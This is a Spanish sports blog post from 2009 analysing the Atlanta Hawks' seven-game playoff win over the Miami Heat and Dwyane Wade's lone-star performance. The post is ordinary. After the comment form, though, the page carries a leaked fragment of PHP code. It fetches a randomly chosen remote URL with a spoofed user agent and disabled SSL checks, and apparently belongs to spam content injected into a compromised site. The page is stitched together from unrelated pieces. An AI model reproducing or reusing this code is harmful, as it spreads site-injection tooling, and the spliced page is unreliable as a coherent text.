Hawks 4 – Heat 3: Parar a Flash

04 de May de 2009 por TheDeerHunter

Última serie de primera ronda y último patinazo en nuestras apuestas. No ha sido porque no confiáramos en los Hawks, sin lugar a dudas uno de los más sólidos equipos del Este que, incluso por momentos, ha logrado plantar cara al grande que le haya tocado en suerte. Más bien ha sido porque, como cualquier mortal que haya visto desplegar su juego al animal de Wade, hemos tenido fe ciega en él desde que pronosticamos que se iba a meter en playoffs a pesar de contar con uno de los equipos más débiles de la competición. El caso es que los hechos no nos han terminado de quitar la razón.

Los Heat (apenas Wade y sólo Wade) han sido globalmente mejores a los rocosos Hawks, hasta la fecha el equipo empíricamente mejor preparado para detenerle. Más puntos por partido, mejores porcentajes, más rebotes, robos, tapones, menos pérdidas… Parece increíble que finalmente hayan caído derrotados. Pero la realidad, aún con todos esos números encima la mesa, es que los Hawks son mejores. Se decía en nuestra previa que tienen de lejos mejores jugadores en todas las posiciones excepto en la que se refiere a Wade. Añadíamos que también tienen un banco mucho mejor que los Heat y, con todo, aún intuíamos que el asunto iba a estar igualado. Esa es la dimensión del escolta de Miami.

Los Hawks se han topado con un hueso duro al tratar de parar a Flash. Les ha llevado a emplearse hasta el límite de todo sin alcanzar de forma efectiva su objetivo. Todo ha sido un cara o cruz tras ese intento y sin embargo, casi sin quererlo, se han topado con la solución que les ha conducido a la victoria. Y es que si Wade ha logrado resistir la exigencia máxima que los Hawks han impuesto, no lo han logrado sus compañeros. O’Neal, el inesperado segundo espada ha terminado rompiéndose; Haslem, ejemplo de profesionalidad y temple, borrándose; Chalmers o Cook apagados tras una temporada brillante; James Jones como ha podido… Tan sólo Beasley se ha mantenido en un tono relativamente correcto, pero aquí no tenemos un elemento decisivo por si mismo, no tenemos un Rose, al menos de momento.

Los Hawks son justos semifinalistas, como también lo hubiera sido Miami en el caso de haber resistido el séptimo envite. Todo se ha resuelto en un suspiro. El suspiro que ha terminado sometiéndolos y el extra de resistencia que les habría hecho falta.

Aún con la derrota, para los Heat la temporada ha sido excelente. No podemos evitar un sentimiento de decepción por no poder ver el Wade-Lebron… pero con el escolta en sus filas este equipo volverá pronto a la élite.

Ahora la pregunta es ¿son los Hawks el equipo ideal para parar a Lebron?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>